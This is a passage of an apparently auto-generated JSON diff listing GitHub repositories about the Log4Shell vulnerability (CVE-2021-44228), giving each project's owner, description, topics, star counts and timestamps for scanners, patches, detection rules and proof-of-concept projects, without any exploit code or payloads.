"Log4Shell", + "full_name": "0xsyr0\/Log4Shell", + "owner": { + "login": "0xsyr0", + "id": 67317571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67317571?v=4", + "html_url": "https:\/\/github.com\/0xsyr0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xsyr0\/Log4Shell", + "description": "This repository contains all gathered resources we used during our Incident Reponse on CVE-2021-44228 and CVE-2021-45046 aka Log4Shell.", + "fork": false, + "created_at": "2021-12-13T11:34:54Z", + "updated_at": "2024-01-17T16:03:44Z", + "pushed_at": "2024-02-21T15:47:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-44228", + "log4j", + "log4shell" + ], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 437860177, + "name": "log4j-rce-CVE-2021-44228", + "full_name": "1hakusai1\/log4j-rce-CVE-2021-44228", + "owner": { + "login": "1hakusai1", + "id": 55519230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55519230?v=4", + "html_url": "https:\/\/github.com\/1hakusai1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1hakusai1\/log4j-rce-CVE-2021-44228", + "description": "log4j2 CVE-2021-44228 POC", + "fork": false, + "created_at": "2021-12-13T12:15:10Z", + "updated_at": "2022-10-04T05:04:19Z", + "pushed_at": "2021-12-13T13:00:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437866496, + "name": "log4j-rce-test", + "full_name": "jeffli1024\/log4j-rce-test", + "owner": { + "login": "jeffli1024", + "id": 33046602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046602?v=4", + "html_url": "https:\/\/github.com\/jeffli1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeffli1024\/log4j-rce-test", + "description": "CVE-2021-44228 - Apache log4j RCE quick test", + "fork": false, + "created_at": "2021-12-13T12:35:39Z", + "updated_at": "2023-02-07T00:20:03Z", + "pushed_at": "2021-12-13T21:53:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437876264, + "name": "Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service", + "full_name": "zsolt-halo\/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service", + "owner": { + "login": "zsolt-halo", + "id": 2437516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2437516?v=4", + "html_url": "https:\/\/github.com\/zsolt-halo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zsolt-halo\/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service", + "description": null, + "fork": false, + "created_at": "2021-12-13T13:05:26Z", + "updated_at": "2023-08-15T12:50:31Z", + "pushed_at": "2021-12-13T13:26:11Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437877109, + "name": "log4j-cve-2021-44228", + "full_name": "manuel-alvarez-alvarez\/log4j-cve-2021-44228", + "owner": { + "login": "manuel-alvarez-alvarez", + "id": 4885539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4885539?v=4", + "html_url": "https:\/\/github.com\/manuel-alvarez-alvarez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuel-alvarez-alvarez\/log4j-cve-2021-44228", + "description": "Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...", + "fork": false, + "created_at": "2021-12-13T13:08:03Z", + "updated_at": "2024-05-14T08:37:19Z", + "pushed_at": "2021-12-21T11:12:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437882599, + "name": "CVE-2021-44228", + "full_name": "VNYui\/CVE-2021-44228", + "owner": { + "login": "VNYui", + "id": 14999242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14999242?v=4", + "html_url": "https:\/\/github.com\/VNYui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VNYui\/CVE-2021-44228", + "description": "Mass recognition tool for CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T13:25:19Z", + "updated_at": "2021-12-13T13:37:39Z", + "pushed_at": "2021-12-13T13:37:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437883625, + "name": "Scan-CVE-2021-44228", + "full_name": "flxhaas\/Scan-CVE-2021-44228", + "owner": { + "login": "flxhaas", + "id": 5561099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5561099?v=4", + "html_url": "https:\/\/github.com\/flxhaas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flxhaas\/Scan-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-13T13:28:26Z", + "updated_at": "2021-12-13T13:28:26Z", + "pushed_at": "2021-12-13T13:28:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437884471, + "name": "Log4j-CVE-2021-44228", + "full_name": "justakazh\/Log4j-CVE-2021-44228", + "owner": { + "login": "justakazh", + "id": 36891477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36891477?v=4", + "html_url": "https:\/\/github.com\/justakazh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justakazh\/Log4j-CVE-2021-44228", + "description": "Mass Check Vulnerable Log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T13:30:57Z", + "updated_at": "2024-08-12T20:18:51Z", + "pushed_at": "2021-12-13T14:17:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "exploit", + "log4j", + "scanner" + ], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437888133, + "name": "f5-waf-quick-patch-cve-2021-44228", + "full_name": "irgoncalves\/f5-waf-quick-patch-cve-2021-44228", + "owner": { + "login": "irgoncalves", + "id": 23459099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23459099?v=4", + "html_url": "https:\/\/github.com\/irgoncalves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irgoncalves\/f5-waf-quick-patch-cve-2021-44228", + "description": "This tool creates a custom signature set on F5 WAF and apply to policies in blocking mode", + "fork": false, + "created_at": "2021-12-13T13:41:39Z", + "updated_at": "2023-02-11T20:16:19Z", + "pushed_at": "2022-05-04T23:49:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437902732, + "name": "JndiLookup", + "full_name": "madCdan\/JndiLookup", + "owner": { + "login": "madCdan", + "id": 10784600, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10784600?v=4", + "html_url": "https:\/\/github.com\/madCdan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/madCdan\/JndiLookup", + "description": "Some tools to help mitigating Apache Log4j 2 CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T14:22:34Z", + "updated_at": "2021-12-18T02:12:49Z", + "pushed_at": "2021-12-13T17:07:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437904012, + "name": "MC-Log4j-Patcher", + "full_name": "Koupah\/MC-Log4j-Patcher", + "owner": { + "login": "Koupah", + "id": 25888315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25888315?v=4", + "html_url": "https:\/\/github.com\/Koupah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Koupah\/MC-Log4j-Patcher", + "description": "A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).", + "fork": false, + "created_at": "2021-12-13T14:26:24Z", + "updated_at": "2022-01-04T03:00:29Z", + "pushed_at": "2022-01-16T01:59:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437917354, + "name": "Fix-CVE-2021-44228", + "full_name": "AlexandreHeroux\/Fix-CVE-2021-44228", + "owner": { + "login": "AlexandreHeroux", + "id": 28022186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28022186?v=4", + "html_url": "https:\/\/github.com\/AlexandreHeroux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlexandreHeroux\/Fix-CVE-2021-44228", + "description": "Apply class remove process from ear\/war\/jar\/zip archive, see https:\/\/logging.apache.org\/log4j\/2.x\/", + "fork": false, + "created_at": "2021-12-13T15:04:31Z", + "updated_at": "2024-05-20T03:26:22Z", + "pushed_at": "2021-12-15T02:02:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437919806, + "name": "log4j-CVE-2021-44228-test", + "full_name": "kossatzd\/log4j-CVE-2021-44228-test", + "owner": { + "login": "kossatzd", + "id": 3578287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3578287?v=4", + "html_url": "https:\/\/github.com\/kossatzd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kossatzd\/log4j-CVE-2021-44228-test", + "description": "demo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability", + "fork": false, + "created_at": "2021-12-13T15:11:15Z", + "updated_at": "2021-12-24T22:09:51Z", + "pushed_at": "2021-12-24T22:09:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437937629, + "name": "log4j-CVE-2021-44228", + "full_name": "tobiasoed\/log4j-CVE-2021-44228", + "owner": { + "login": "tobiasoed", + "id": 12912943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12912943?v=4", + "html_url": "https:\/\/github.com\/tobiasoed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tobiasoed\/log4j-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-13T16:04:54Z", + "updated_at": "2021-12-21T02:30:06Z", + "pushed_at": "2022-02-21T23:45:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437948564, + "name": "log4shell_ioc_ips", + "full_name": "hackinghippo\/log4shell_ioc_ips", + "owner": { + "login": "hackinghippo", + "id": 96073490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96073490?v=4", + "html_url": "https:\/\/github.com\/hackinghippo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackinghippo\/log4shell_ioc_ips", + "description": "log4j \/ log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-13T16:39:16Z", + "updated_at": "2023-12-11T04:51:15Z", + "pushed_at": "2022-01-07T17:00:38Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-44228", + "ioc", + "list", + "log4j", + "log4shell", + "shell4log" + ], + "visibility": "public", + "forks": 12, + "watchers": 36, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 437948858, + "name": "log4j-1.2.15-mod", + "full_name": "p3dr16k\/log4j-1.2.15-mod", + "owner": { + "login": "p3dr16k", + "id": 9317261, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9317261?v=4", + "html_url": "https:\/\/github.com\/p3dr16k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p3dr16k\/log4j-1.2.15-mod", + "description": "log4j version 1 with a patch for CVE-2021-44228 vulnerability", + "fork": false, + "created_at": "2021-12-13T16:40:14Z", + "updated_at": "2021-12-14T11:41:29Z", + "pushed_at": "2021-12-14T11:39:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437949273, + "name": "ansible-role-log4shell", + "full_name": "claranet\/ansible-role-log4shell", + "owner": { + "login": "claranet", + "id": 7526691, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7526691?v=4", + "html_url": "https:\/\/github.com\/claranet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/claranet\/ansible-role-log4shell", + "description": "Find Log4Shell CVE-2021-44228 on your system", + "fork": false, + "created_at": "2021-12-13T16:41:31Z", + "updated_at": "2023-11-16T14:11:42Z", + "pushed_at": "2024-06-20T08:48:06Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ansible", + "claranet", + "log4j", + "log4shell", + "role" + ], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 437960695, + "name": "CVE-2021-44228", + "full_name": "taurusxin\/CVE-2021-44228", + "owner": { + "login": "taurusxin", + "id": 17809960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17809960?v=4", + "html_url": "https:\/\/github.com\/taurusxin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taurusxin\/CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-13T17:17:37Z", + "updated_at": "2024-08-14T03:52:41Z", + "pushed_at": "2021-12-13T17:22:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437963154, + "name": "cve-2021-44228", + "full_name": "corelight\/cve-2021-44228", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/cve-2021-44228", + "description": "Log4j Exploit Detection Logic for Zeek", + "fork": false, + "created_at": "2021-12-13T17:25:52Z", + "updated_at": "2024-10-12T10:55:49Z", + "pushed_at": "2024-05-04T18:38:58Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "zeek" + ], + "visibility": "public", + "forks": 8, + "watchers": 19, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 437965181, + "name": "log4j2-prosecutor", + "full_name": "rodfer0x80\/log4j2-prosecutor", + "owner": { + "login": "rodfer0x80", + "id": 52704508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52704508?v=4", + "html_url": "https:\/\/github.com\/rodfer0x80", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rodfer0x80\/log4j2-prosecutor", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T17:32:26Z", + "updated_at": "2021-12-23T10:05:33Z", + "pushed_at": "2021-12-23T10:05:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437968616, + "name": "CVE-2021-44228_Log4Shell", + "full_name": "yanghaoi\/CVE-2021-44228_Log4Shell", + "owner": { + "login": "yanghaoi", + "id": 21354684, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21354684?v=4", + "html_url": "https:\/\/github.com\/yanghaoi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanghaoi\/CVE-2021-44228_Log4Shell", + "description": "Log4Shell A test for CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T17:44:01Z", + "updated_at": "2021-12-13T18:03:51Z", + "pushed_at": "2021-12-13T18:06:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437983994, + "name": "log4j_checker", + "full_name": "lfama\/log4j_checker", + "owner": { + "login": "lfama", + "id": 14056990, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14056990?v=4", + "html_url": "https:\/\/github.com\/lfama", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfama\/log4j_checker", + "description": "Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.", + "fork": false, + "created_at": "2021-12-13T18:35:16Z", + "updated_at": "2024-01-16T00:41:28Z", + "pushed_at": "2021-12-21T16:01:08Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4shell", + "python", + "python3", + "scan", + "scanner", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437988861, + "name": "Log4j-IOCs", + "full_name": "threatmonit\/Log4j-IOCs", + "owner": { + "login": "threatmonit", + "id": 90388073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90388073?v=4", + "html_url": "https:\/\/github.com\/threatmonit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/threatmonit\/Log4j-IOCs", + "description": "Public IOCs about log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T18:52:19Z", + "updated_at": "2023-05-09T18:44:15Z", + "pushed_at": "2021-12-13T19:11:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437995131, + "name": "l4j-info", + "full_name": "ben-smash\/l4j-info", + "owner": { + "login": "ben-smash", + "id": 95368649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95368649?v=4", + "html_url": "https:\/\/github.com\/ben-smash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ben-smash\/l4j-info", + "description": "Compiling links of value i find regarding CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T19:14:23Z", + "updated_at": "2021-12-13T21:11:09Z", + "pushed_at": "2021-12-13T21:11:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438003225, + "name": "log4j-test", + "full_name": "strawhatasif\/log4j-test", + "owner": { + "login": "strawhatasif", + "id": 10750101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10750101?v=4", + "html_url": "https:\/\/github.com\/strawhatasif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/strawhatasif\/log4j-test", + "description": "Demonstration of CVE-2021-44228 with a possible strategic fix.", + "fork": false, + "created_at": "2021-12-13T19:43:01Z", + "updated_at": "2021-12-13T20:26:40Z", + "pushed_at": "2021-12-13T20:26:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438012376, + "name": "nmap-log4shell", + "full_name": "giterlizzi\/nmap-log4shell", + "owner": { + "login": "giterlizzi", + "id": 1824717, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1824717?v=4", + "html_url": "https:\/\/github.com\/giterlizzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giterlizzi\/nmap-log4shell", + "description": "Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-13T20:17:14Z", + "updated_at": "2024-08-11T16:38:47Z", + "pushed_at": "2021-12-17T17:23:57Z", + "stargazers_count": 77, + "watchers_count": 77, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4shell", + "nmap", + "nmap-scripts", + "vulnerability" + ], + "visibility": "public", + "forks": 21, + "watchers": 77, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 438013062, + "name": "Siem-queries-for-CVE-2021-44228", + "full_name": "tica506\/Siem-queries-for-CVE-2021-44228", + "owner": { + "login": "tica506", + "id": 93236626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93236626?v=4", + "html_url": "https:\/\/github.com\/tica506", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tica506\/Siem-queries-for-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-13T20:19:57Z", + "updated_at": "2021-12-13T20:56:54Z", + "pushed_at": "2021-12-13T20:56:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438021782, + "name": "log4shell-example", + "full_name": "chilit-nl\/log4shell-example", + "owner": { + "login": "chilit-nl", + "id": 96049152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96049152?v=4", + "html_url": "https:\/\/github.com\/chilit-nl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chilit-nl\/log4shell-example", + "description": "The goal of this project is to demonstrate the log4j cve-2021-44228 exploit vulnerability in a spring-boot setup, and to show how to fix it.", + "fork": false, + "created_at": "2021-12-13T20:54:10Z", + "updated_at": "2021-12-14T08:30:57Z", + "pushed_at": "2021-12-14T08:18:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4j2", + "log4shell" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438026042, + "name": "log4j-checker", + "full_name": "Occamsec\/log4j-checker", + "owner": { + "login": "Occamsec", + "id": 55592824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55592824?v=4", + "html_url": "https:\/\/github.com\/Occamsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Occamsec\/log4j-checker", + "description": "Bash and PowerShell scripts to scan a local filesystem for Log4j .jar files which could be vulnerable to CVE-2021-44228 aka Log4Shell.", + "fork": false, + "created_at": "2021-12-13T21:11:18Z", + "updated_at": "2021-12-21T15:16:18Z", + "pushed_at": "2021-12-16T17:44:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "log4j", + "log4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438028657, + "name": "log4j2-CVE-2021-44228-poc-local", + "full_name": "snatalius\/log4j2-CVE-2021-44228-poc-local", + "owner": { + "login": "snatalius", + "id": 22771118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22771118?v=4", + "html_url": "https:\/\/github.com\/snatalius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snatalius\/log4j2-CVE-2021-44228-poc-local", + "description": "Just a personal proof of concept of CVE-2021-44228 on log4j2", + "fork": false, + "created_at": "2021-12-13T21:21:53Z", + "updated_at": "2021-12-13T21:21:56Z", + "pushed_at": "2021-12-13T21:21:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438032780, + "name": "CVE-2021-44228", + "full_name": "Contrast-Security-OSS\/CVE-2021-44228", + "owner": { + "login": "Contrast-Security-OSS", + "id": 5577345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5577345?v=4", + "html_url": "https:\/\/github.com\/Contrast-Security-OSS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Contrast-Security-OSS\/CVE-2021-44228", + "description": "Professional Service scripts to aid in the identification of affected Java applications in TeamServer", + "fork": false, + "created_at": "2021-12-13T21:39:39Z", + "updated_at": "2021-12-14T01:40:19Z", + "pushed_at": "2021-12-22T13:15:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 438032826, + "name": "log4shell-rex", + "full_name": "back2root\/log4shell-rex", + "owner": { + "login": "back2root", + "id": 9200239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9200239?v=4", + "html_url": "https:\/\/github.com\/back2root", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/back2root\/log4shell-rex", + "description": "PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs", + "fork": false, + "created_at": "2021-12-13T21:39:51Z", + "updated_at": "2024-11-25T13:32:41Z", + "pushed_at": "2021-12-21T01:24:46Z", + "stargazers_count": 291, + "watchers_count": 291, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 291, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 438034703, + "name": "log4shell-tools", + "full_name": "alexbakker\/log4shell-tools", + "owner": { + "login": "alexbakker", + "id": 2387841, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2387841?v=4", + "html_url": "https:\/\/github.com\/alexbakker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexbakker\/log4shell-tools", + "description": "Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046", + "fork": false, + "created_at": "2021-12-13T21:47:41Z", + "updated_at": "2024-10-28T07:04:55Z", + "pushed_at": "2024-04-07T22:45:53Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "dns", + "jndi", + "ldap", + "log4j", + "log4shell" + ], + "visibility": "public", + "forks": 17, + "watchers": 86, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 438043313, + "name": "find-log4j", + "full_name": "perryflynn\/find-log4j", + "owner": { + "login": "perryflynn", + "id": 1693988, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1693988?v=4", + "html_url": "https:\/\/github.com\/perryflynn", + "user_view_type": "public" + }, + "html_url": 